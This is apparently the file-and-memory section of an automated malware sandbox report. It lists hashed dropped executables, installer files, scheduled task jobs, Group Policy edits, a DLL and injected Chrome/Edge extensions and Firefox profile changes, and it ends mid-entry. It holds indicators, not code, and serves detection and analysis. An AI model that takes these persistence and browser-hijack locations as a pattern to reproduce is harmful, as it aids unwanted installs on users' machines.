US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 25.73.42.20.in-addr.arpa udp

Files

memory/2916-0-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2916-1-0x000000007527E000-0x000000007527F000-memory.dmp

memory/2916-2-0x0000000075270000-0x0000000075A20000-memory.dmp

C:\Users\Admin\Pictures\lMPtsOF3JT7QrT3hYYLF0lim.exe

MD5 77f762f953163d7639dff697104e1470
SHA1 ade9fff9ffc2d587d50c636c28e4cd8dd99548d3
SHA256 d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea
SHA512 d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499

C:\Users\Admin\Pictures\SD3V9PvP2v9pKC5cnuKd9aPW.exe

MD5 baf486a7d8bc878a73ea8e6463a2de4c
SHA1 fcfc0e3d6aab4cf4c3efcbb58d75a615e65cfa81
SHA256 7076f8f5ab12bb48483bd31de3b88f89cdbae95d0e956d76faedfc21a37f3b13
SHA512 171f50e38744706873d2c07b0f5e3364e563dd6d2dbcdc6fe19d23c487beb03f57f39af58917d52ff8724316e8b69d2b938e7bdc0a86c876382a7e342de4f95f

C:\Users\Admin\Pictures\uwmmnHhLqAONFLP0yZ3zADwp.exe

MD5 1bd87b4dc3556578e6c21bed01659bda
SHA1 a3a251031e6585a56b06bbfd38d1ead5988f9568
SHA256 40afcb67044d0be0bb2ac42ca5d5520eb623ee80d016ae56a01740084087220f
SHA512 74df1d68939a8c238f855f14b085525e7382b880656823b400206eef3469b6c5862734ac7b83602d9dbe37e4de9bc892f91c06540c8d28960b2a2301400ce91e

memory/4284-39-0x00007FFF61DB0000-0x00007FFF61DB2000-memory.dmp

memory/4284-44-0x00007FFF5FA60000-0x00007FFF5FA62000-memory.dmp

memory/4284-46-0x00007FF770EA0000-0x00007FF77146C000-memory.dmp

memory/4284-43-0x00007FFF5FA50000-0x00007FFF5FA52000-memory.dmp

memory/4284-42-0x00007FFF61590000-0x00007FFF61592000-memory.dmp

memory/4284-41-0x00007FFF61580000-0x00007FFF61582000-memory.dmp

memory/4284-40-0x00007FFF61DC0000-0x00007FFF61DC2000-memory.dmp

memory/4284-38-0x00007FF771005000-0x00007FF771194000-memory.dmp

memory/2184-68-0x0000000000400000-0x0000000002396000-memory.dmp

C:\Users\Admin\Pictures\JN0WyMsswwbbFizvqZKXA14d.exe

MD5 31d5a9a07bcc89cc309f43ff6c4df8b7
SHA1 201c65b80b4f5b6a16503c0ceff4d3c4071760a1
SHA256 ee4d145feb7af5d19fb2056c7592503d043ef25cb9f7b7cd7a5f593de38be984
SHA512 46107939724d8261769783dc4b2e25939540c6f30b4ebab5fe2fe95217fbff1f5e23160457ed1946a6ebdb4ecb13c0a857e4b57f159d41eb45b1aed8c16ab879

C:\Users\Admin\AppData\Local\Temp\7zS3B4.tmp\Install.exe

MD5 a27e77a9c2c49efcc728ddd10d9b71b6
SHA1 1675dca2703ef641c7715572f50584be5576f47b
SHA256 01f0ac89dd98f9538f10abc2a5d20941d5b990b83491336de5cfc5a4e5339a13
SHA512 83f4f64dd8d69b0696b2f21982152efa4d1e400c8f8ff4d47549305bb7f03d5859d57906682257812fe0ef87a3e66f14d996782d7bef897e916c7903fe847127

C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe

MD5 fb24a14b1f861c335a297e5373e78ad5
SHA1 0e009c05c52ed175d06046d801b56606201ca7ed
SHA256 1db04b53fab4b3715276640eefd7acab9a9b13e44df4ac96c6c753be99c34dab
SHA512 f614a29a4a89f4e9a377c776d347467738fec2ce24264c48e759b1e99522e977b013367fcc9501ce273b2a54a81bb1b2e5b6097fe593fafcd4218a7c87a3bdc4

memory/4284-98-0x00000215979B0000-0x00000215979D7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\181767204200

MD5 e8d9134e8a444e534f47fe2a8630ebfa
SHA1 3d28fd6a5ff121803fd33fabd1e42acabc01fcbb
SHA256 8c88164ad04f3020b2efee4bb1373cb91370c146d096e8953203595cb4e7cb38
SHA512 238f9ab4822dadf98ec1070d74ea39c384d39d1e206fa0c85e0ce8259e541aad7a3580431faca3332002e80b0e3926fc257bd2df02f0d2a6b42ac6fb43bf4ce5

memory/228-103-0x0000000004550000-0x0000000004586000-memory.dmp

memory/228-104-0x0000000004C30000-0x0000000005258000-memory.dmp

memory/228-107-0x00000000054A0000-0x0000000005506000-memory.dmp

memory/228-106-0x0000000005430000-0x0000000005496000-memory.dmp

memory/228-105-0x0000000005390000-0x00000000053B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w4wed3ok.4ft.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/228-113-0x0000000005510000-0x0000000005864000-memory.dmp

memory/228-118-0x0000000005B20000-0x0000000005B3E000-memory.dmp

memory/228-119-0x0000000005B50000-0x0000000005B9C000-memory.dmp

memory/228-122-0x0000000006060000-0x0000000006082000-memory.dmp

memory/228-121-0x0000000006010000-0x000000000602A000-memory.dmp

memory/228-120-0x0000000006090000-0x0000000006126000-memory.dmp

memory/228-123-0x00000000072D0000-0x0000000007874000-memory.dmp

memory/4800-126-0x0000000010000000-0x0000000013BCA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 5315900105942deb090a358a315b06fe
SHA1 22fe5d2e1617c31afbafb91c117508d41ef0ce44
SHA256 e8bd7d8d1d0437c71aceb032f9fb08dd1147f41c048540254971cc60e95d6cd7
SHA512 77e8d15b8c34a1cb01dbee7147987e2cc25c747e0f80d254714a93937a6d2fe08cb5a772cf85ceb8fec56415bfa853234a003173718c4229ba8cfcf2ce6335a6

memory/3564-130-0x0000000005440000-0x0000000005794000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5e4e2d839ab452777aa037430aba8a7b
SHA1 cbb1fb741dac5883b6664f87ee94cc18523ee266
SHA256 910ed361be704b1de8af62636cea4c1044dba617aebf4902028ef20a80a9d47e
SHA512 c1e269e100056b9f202c2b4d82f9557c4f1426c6c3e64552439f9007be1ff7d4108aa8418ee4bdc12069914586d5893a32a503430c5c364271d2e5bd1d5dbc00

memory/3564-145-0x0000000005B60000-0x0000000005BAC000-memory.dmp

memory/4980-150-0x0000000000400000-0x0000000002396000-memory.dmp

memory/3172-163-0x0000000004DF0000-0x0000000005144000-memory.dmp

memory/2916-167-0x000000007527E000-0x000000007527F000-memory.dmp

memory/2916-168-0x0000000075270000-0x0000000075A20000-memory.dmp

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 cdfd60e717a44c2349b553e011958b85
SHA1 431136102a6fb52a00e416964d4c27089155f73b
SHA256 0ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f
SHA512 dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8

memory/4600-169-0x0000000010000000-0x0000000013BCA000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 40f26c3d61c03d4478bfe84e43554787
SHA1 2cc75b3aaf5d181c3498c63c096d13f3fa4a9344
SHA256 bb5c177641b9c385aff657f258d56e1fd0688ada592280d2f6108c14df53aad1
SHA512 475fcb9d535be013a713994935e04b9a3cc99ead987686db06c68cfc2e3baf399228461f0a5b4de2557e466aa062c5bd8e15286acfead6b5d2393ca5707d2da5

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1706866b715776437dfab0da1b0c6017
SHA1 ff4e2eb97849b5431d363b68900b7efdf512dad6
SHA256 4a53bc7b59c212d3ed14efa80afa9b35e703640471b604abbf57ab92cad5bc02
SHA512 0127fa31d593f57a38f835045bbbc5cd9851deb141e874465406a30260f8d08cadc0139844f89f95582b8e6ba11131d7b35a7e32f9be0efc1ccaa48f48858a75

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

memory/4284-200-0x00007FF771005000-0x00007FF771194000-memory.dmp

memory/1964-201-0x0000029C6ED10000-0x0000029C6ED32000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9f7b57c6d588a63fe9495648e287776b
SHA1 5559611f9fbc13c9e0443623561e023cb72aaf19
SHA256 9fdc075349e3330fe6b916dcfcd0eebc439146dcd0b52ef6cf052cd19e3b031b
SHA512 9ae79d8e264a33460abe294d3faf6c607734d7b4b69a128ebf50cf98b8e51ec5de1e0a6a140c4cb27e19357b905b19bce89a4381ae2e50ac344b8ef288069459

memory/2756-227-0x0000000000400000-0x0000000002396000-memory.dmp

memory/4728-235-0x0000000004120000-0x0000000004474000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e6d47dc1c302d9146c7ad8288e4b1b64
SHA1 76222b0719eba1436f058df2af304b545dc554a1
SHA256 af30d47663cb9161e17bd3e2a53fcab03f78051e42d150e2acd30f71ed6036f7
SHA512 be41472a913bb5df0fb19a21bb52e1b95b4e8714bddcead3017de2be8c8aae505116d877c040c0e4a33cc8b54df0d3d0e2258e74a1d917005fb49f703bdb2501

memory/4728-240-0x0000000004CB0000-0x0000000004CFC000-memory.dmp

memory/392-251-0x0000000004990000-0x0000000004CE4000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 03789cff4c3c91b8e41e75d97627939c
SHA1 58ae365a34b45bb5f634850ba35e4fa394e44049
SHA256 6c577c0dbb1fef079b73ef591821add5a44f44cada7a272b074d831fc49c013e
SHA512 cb4a93d3feaad15aa44930bbab9271e57d92133a54f36c193d9c2563653080b54272a7e51258e87e6701cb3271450866d5ffd639fb9b0e623c71724d2da38c02

memory/2188-254-0x0000000010000000-0x0000000013BCA000-memory.dmp

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 0b7a469a2d76102d85e7c85ca4a6f75d
SHA1 0b88a6515a20d820312aa2d322db633377edd316
SHA256 795a52cca494e786f204ee43cc35826f738150862aa57f45f0b01933a2c22da0
SHA512 e9d06f2021a033bece6da5e603a7403e2482f13f518ccadef20efc4383815fdefa807d882e41cdce0e61a54b0065f1d11c8e7ac63b5a0e81fe1d7b0463f30a44

memory/4404-258-0x0000000010000000-0x0000000013BCA000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3d9a5ece9a78ed029cdd1bb87ac02c8a
SHA1 c3ed07bcae790d6ecf7020f672627477e717734e
SHA256 de90040272e1986c9fde3b1ca1467debc7b809d3fd4f598ee2fada653f44f096
SHA512 649892a5a6c13354985979b53df669800221ac529eb2c9c0c2d4bd39fabdeee6587bc8650d2ce43147740075ec76db1331145081f2c15b5fe1248a44a2d196df

memory/2188-289-0x0000000002E20000-0x0000000002EA5000-memory.dmp

C:\$RECYCLE.BIN\S-1-5-18\desktop.ini

MD5 a526b9e7c716b3489d8cc062fbce4005
SHA1 2df502a944ff721241be20a9e449d2acd07e0312
SHA256 e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512 d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 a5a65b54d6d664bf4dec04e88db479a3
SHA1 e48e9bd01b5f8264e9a689b39acb4c9477e2e4e4
SHA256 1eba35756117be501af3f305e059490faac2ee2a9ab73f6d19b668d11673f6ad
SHA512 06f1e548ffe808df73dd52ada0d4c3e066280dba6c1e1aeebd9b425eb52ddab323b06c90484d1653ef8277d2f89a4202222e39b38cf6bd11f2fd2254666e5364

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dfa21a3b49cde2676cc46f3589c4be75
SHA1 23bdd09727db3feaba53157f7189621f49200feb
SHA256 0774f1e3906ef1d274300dc9e0a718390d44f7fb4ceb8706e83991288b95d24c
SHA512 519e5f6c423b702a1f143e7d176d1de2c0cc856dc4c6b9d3e71b597b0a07c7c6dbde18ca6e9df1c8cb0b83663432716a7f210f91dd0a8d5c400a63cf5e48d9a8

C:\Windows\Tasks\PhaZdSAoTEvbQMDnk.job

MD5 5218746f326980c16d001884e26c1f55
SHA1 7f8ff806499c346f972e2eab3d0120bd10707525
SHA256 3d85792cd45be62c643a72a0104104279a11b97b20b0101782cbebcda3fbf2dc
SHA512 15498c347832a21d87129c6c2f56d026b18b94d07ade9a0e1a399289dc735315de549d95bc071325aec02e511d678c149c9ea4d85509ff67bbeab4eca728f635

memory/2188-337-0x0000000003390000-0x00000000033F3000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Program Files (x86)\YFvDcakXU\xkVzZHx.xml

MD5 7f2b667f1382c87aeef1ee9d27ae94a8
SHA1 990506503188ed50f4df8b9fdc82bb3d21fbb7a4
SHA256 de55b49b3ed23e725049781c8b24f9a7daf9eade961ca7aaa1e20a6235f06f3f
SHA512 a202b590b2ad03896288dc351e059fd9552f4cda31f50f805c5f257afb0fb2686296e08320094fd5885ec842da688ecebc33ce9dcb4ccd0cc19e9ec625f72094

C:\Program Files (x86)\EhcFZyxgIKdU2\YSesdbb.xml

MD5 ccead01757fe57da4a3dc4440215ac7d
SHA1 d1ea8da1cc1b9b56b0b12a10c3f5154920614d2a
SHA256 dcc33a450d55fec77476c44b84d3708164fb4115b4d2bf321127960701e55478
SHA512 84ad672cc6e02aca6f4d1d8d4a35a35b849d46baa4211121772aea75ca593e513f424a01f7bf1b9734baa1063ddff66998e422def51cc2fc1bd8a6f5ea573429

C:\ProgramData\CPUWfhACwAFVvAVB\HbYEILi.xml

MD5 ea6ea4063e23fbaa262ef5e310b608a7
SHA1 3d2c75f0693e310fb53968c5610a94027ac6256c
SHA256 7196e66eb9670f74f7e787366c28812f42799646f3bde1cc482a5afc5199695e
SHA512 1a29851eb708b1c8dd878d1ef2ca2b3b8a346d37171e1c63d50df193c607ce856fce86a04094497bf24494a8348018563adbd3319bf3296b06abaed79c4f19df

C:\Program Files (x86)\uBqHJZyJRZafGAkLOrR\TUmeTrq.xml

MD5 abbbb747a84bcc5c4a3480fcb2f9dcce
SHA1 600151c64e5336fcd890bb3f2a9534eddf937958
SHA256 5c56202314e33eb79991735eecc80b1551aa7a8a42609e52fcd855f9cebd8203
SHA512 71506df9649f00982426d3d7a5bbea87454021554398f186159ecf375d6d08f7bc216b4208d85f590ac3bb84ddb12dba608d18c4b21d7ce90caa99cf2e405bc9

C:\Program Files (x86)\zkyeWAejRmGXC\YHKmCEg.xml

MD5 a930f3283c91550bd63cc6157805f5d4
SHA1 fdd71d99a66244ab0e69c732825702960c8a3b8a
SHA256 7b3a7c68b500bc6533373104c0834ad70b78e12aafaadfad3b5cf4be6373de6b
SHA512 acf498ae943c72fc618d2cfd01251d7133059b8c9bca02cab290e2628b82746581d29fcb7b140e5be6fade2710d5ed28562b00ae817811f8f4f0a6e749c50d87

C:\Windows\Temp\czMOsRWjwZXFHErP\GteFtAcY\suffBuq.dll

MD5 1e65763df45357bb6ab994148b7880fe
SHA1 28ba8e8a4c8cfa239d4f109b67eb1ca1d13d80f5
SHA256 5b4c3ebfb037cfc86e695e6fecc3c54759193bce02e9b43734e3ea7a99379a4a
SHA512 7e3780e85a3281b55fc912676ab69244483fad2d3c46b647741b0d755a04ed191f78fcc85c603991c28b80437b9cabbf3dc86e3897f9fb8ca5d2207b9d0f5363

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\prefs.js

MD5 bcd6d4997b0f644d3baa26cfe8158e26
SHA1 ee8dd9358badf81a4867f43f492d2164db860c7d
SHA256 e398505817055b64e07eb09b50b552817ef1c251424da0f84c91d40481f651cc
SHA512 c6fc1bc52ea94657c9148ab771d0c54702a67865c2cf40ca4421a90c49d483717fc257e6d500bdde963fafcffe0fe4bcb659a06f542f3aca642fda6021b18821

memory/2188-667-0x0000000003730000-0x00000000037A9000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 001ae6a3c7823e56ccabe4fd303d138e
SHA1 e84fe416faef6b9a248ff4afb966aeb4b08956d0
SHA256 28e77dbc619e8a833026e0b8a621b0dc2946aa612af5da76b93846030676e31b
SHA512 06a809b9a4419b27f09f8ccc2a89f52204bdc320a0b960d190584c24dd9936d4d3548182738b9a295fd6988bf211e1686e3f1e55f37d344a73409bf4c9367320

memory/2188-682-0x00000000040C0000-0x0000000004194000-memory.dmp

memory/64-705-0x0000000002090000-0x0000000005C5A000-memory.dmp

memory/2196-749-0x0000000004700000-0x0000000004A54000-memory.dmp

memory/2196-751-0x0000000004E20000-0x0000000004E6C000-memory.dmp

memory/4948-755-0x0000000010000000-0x0000000013BCA000-memory.dmp

memory/1516-769-0x0000000004540000-0x0000000004894000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 40f40289ba341c237bc653d305b616fc
SHA1 5d57875d5fa47045c7897bf48491a0b870e774f2
SHA256 905e6d73874f4256263695b7d5fdbb472d8d5fdcc689584130ecdd97e9820263
SHA512 8ffa6fa3105a900e676c699cdd747fbb02eb7eda17990ccdf21709ede1208071b414021397a25a906e7d8ef443c2d4b0cb42be772ef3cb1442c2cf5255c4ccf5

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\prefs.js

MD5 abfa0cbc95313f02c8422cd17ea71ced
SHA1 5e3e3e3d87056505999181ded8f49458a25206fc
SHA256 e688f18d1cd439a06e6a01cdebedad331ca57709c81a1fedc92ae4af0b0c7a6c
SHA512 9301bd9349484271703752e94e743cf931332356f61f4db39cd6aea26058641bc0d49b08f08a7484d6894b17013f7aaf71948b96530f2773cb3398a1cfe717c6

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\addonStartup.json.lz4

MD5 856ee0a408bd1445bb62f940238c82e1
SHA1 86da8767063d261158f9f74e5367031b26d41c3e
SHA256 5e031a74dd60a64a9f776b7ca9aec73ffcafa9bbaa7d26410df8f0da2836b313
SHA512 6a63eae6bba99f800ca5f723ffc2735203f0d98f755349e3cd1b855df62c5f5a1263323b9eb88967ff6c11f4ece0c248f405d94be09f6bf3c87adfa360a2672b

memory/4948-781-0x0000000002C00000-0x0000000002C85000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\permissions.sqlite

MD5 c725379b56323d2a1ba831f33fe79e0d
SHA1 1af4f926b7219bc46c2e6a2ee8fd36d6aae298c9
SHA256 1b8afdc42f759ec7b2fcfbac63504a3b310474d0742144b7f60d676f7f1c3973
SHA512 693682c825a5d1334f4c5001cf323f60ea201d0c0f8b332f5d1237600d15f41c03940ccffc6a6d2e7a6b9fc3dee071bd93f59630a6a5d70d94268cb2d5ea11da

memory/1516-788-0x0000000004AD0000-0x0000000004B1C000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\omni.ja

MD5 94f9ae3cbdf1257149801ecaa2b89780
SHA1 302bd11a763d65461a0b91d3d6e5b7b00f801690
SHA256 58e7f6e41ae4ff3c95b18584db5cf6175068f15c92e32d4047e16a6289d4c373
SHA512 499e179525912ec61516ea8bbcdcc9f6e10b34d4879f9f26f85ba02df957f02118a75cf482e2a5748da870c170f4634a53c0da34868a03e2e084e27581636d57

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 b5f2f048492e55b44c3bb5b570795f3c
SHA1 f6b1ef5a1c14e7e8e72a33700246ac29963b7675
SHA256 6d904b5317aa8236136ff60296003009a2c2f2a35d919a0dd03feabfc5d18aa4
SHA512 22ad7cc2835f78c7a5927c2e87dd9a261a1adc57f231cdb24811eed80f9101cdaf5a2331fb6afc99d59e12d7d55747206732ef4c0dd66f9a1b7b1a8caed68f0a

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04

MD5 4a7b36c9d6bbf80483df845c83a8a8c3
SHA1 69f4f3ef5e1bb6bdf5b8e5330b67a076f7aa4444
SHA256 4456a2b589873cf4d90881aa1fe7eb9c0697745d1fe8fdea4414a1de75f2d10a
SHA512 4dbe6dc81600f11dbcfa9c3195dff0dd9bfb10a3dab02c9b42b30e77f30c3d8ef8602cc69daf3f91561b1729a92e43855d899cdaf0687736ff6b87e605135240

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04

MD5 4a6aec95c8424046cdf01f7a3aea31bc
SHA1 a6c9965d3babb82604239e5a83bf35a6b2b4db16
SHA256 1f2724b72f64ff3c843fcd280d19808a514ff5dc4660c7ab8a33a8309c52c397
SHA512 386fe0ff8406f737d8561c8e05f82fa28a149436396b7ac067f633923fd97017deff1c74ea8f225aa26ee986e9f6e148c49cf8fabcfffd8a91fcb2749d606564

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 e345f57735c3b6c1215865b336970399
SHA1 fad311a67a61b521afefb89031ee61e2be7723c9
SHA256 75b65fc1d55bf2936d96963a3acedaa9d5bdb2d61704670a6814cba021ba65b6
SHA512 2a04d91f15a94d68b482e7522ea3f49bcf620059aeb78d5c47ea57139c8c379a8ac51ca5914ef59c7140a15ce8b0c3a8b3fd27628aeb6b1f604a138790973c2c

memory/4948-804-0x0000000003460000-0x00000000034C3000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\icons\icon48.png

MD5 49443c42dcbe73d2ccf893e6c785be7f
SHA1 3a671dcb2453135249dcc919d11118f286e48efc
SHA256 e7cf247ccb1b365cd7a14fadd85686b83a9e7b7728590547b8466cafcea757ee
SHA512 c98af48fcd71c59a8e76e74b5268e26ad8b3db9cb80edf0517b70bb4476881cbb4ec55b9c3fd858925ef2f2889679db81190a07b4fd7088179e74f1434cac678

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\icons\icon16.png

MD5 b307bd8d7f1320589cac448aa70ddc50
SHA1 aaed2bfa8275564ae9b1307fa2f47506c1f6eccf
SHA256 61b02a1fca992be08f1a3df547b29b424767d94702e4d99129c2f1ca2e67a113
SHA512 74883fec0c94233231d17461f36e9a5e99cd4e8c2726a918519a8025cb75aaaab92a8dee612470cc4e3cc361fc0c12f5778e016b1570792ac3f4bf0b3bcfb103

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\icons\icon128.png

MD5 77fbb02714eb199614d1b017bf9b3270
SHA1 48149bbf82d472c5cc5839c3623ee6f2e6df7c42
SHA256 2f5282c25c8829a21a79a120e3b097e5316ddbd0f866508b82e38766c7844dba
SHA512 ff5078d585a1ab3bd4e36e29411376537650acbcb937fdad9ac485a9dd7bcb0f593cc76672572a465eb79894ab6b2eddd6a3da21c165ab75c90df020d3e42823

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\icons\ficon128.png

MD5 d2cec80b28b9be2e46d12cfcbcbd3a52
SHA1 2fdac2e9a2909cfdca5df717dcc36a9d0ca8396a
SHA256 6d38e0be2e6c189de3e4d739bae9986ee365a33baf99a9234e5c9effb44b791a
SHA512 89798889d41cfc687a31c820aea487722b04ea40f7fd07ce899a0e215b7b1703380188ba103825a4b863f8cbca76430bfc437705630f0bfcaffd50a78c2bb295

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json

MD5 d8133d3c2d73d91bcff01adb2ea16376
SHA1 d50e724c8c640f98767bf3dd0d70bff240b553e9
SHA256 bda0963eb9d7855e4514d08c1fffc7f305586e6a52cc1079f3bfe26890687e59
SHA512 3d759af83bf9784891722fd412ce034b3a516de838f77e6a59b11580a9b73f0243322d4c1f39e2b5bcbf35f624422fa55aa061aa48054801a091354d1794d813

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\be\messages.json

MD5 2f2efb9c49386fe854d96e8aa233a56f
SHA1 42505da3452e7fd4842ed4bd1d88f8e3e493f172
SHA256 a93a368b5c7023842f9d8b0ee5ef9638c03c808212efefadf7331d3b65482ea3
SHA512 c9bd97f3487ab695dd9245a14058ed70b3be61b6bf21b281efe022a954c17d86208a4004e157ef892af84764ac290c6f97345a50ebeb9d11c16490979859b934

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\ca\messages.json

MD5 7afdcfbd8baa63ba26fb5d48440dd79f
SHA1 6c5909e5077827d2f10801937b2ec74232ee3fa9
SHA256 3a22d19fd72a8158ad5ec9bfa1dcdf70fdb23c0dee82454b69c2244dfd644e67
SHA512 c9acb7850d6392cac39ed4409a7b58c31c4e66def628e9b22a6f5a6a54789e2c67c09427bd57de1ff196bf79eaf1d7dc7423ba32f1ab1764b5a25ef706cbc098

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\cs\messages.json

MD5 0adcbaf7743ed15eb35ac5fb610f99ed
SHA1 189e00f2a1f4ebc7443930e05acc3dcb7ac07f3b
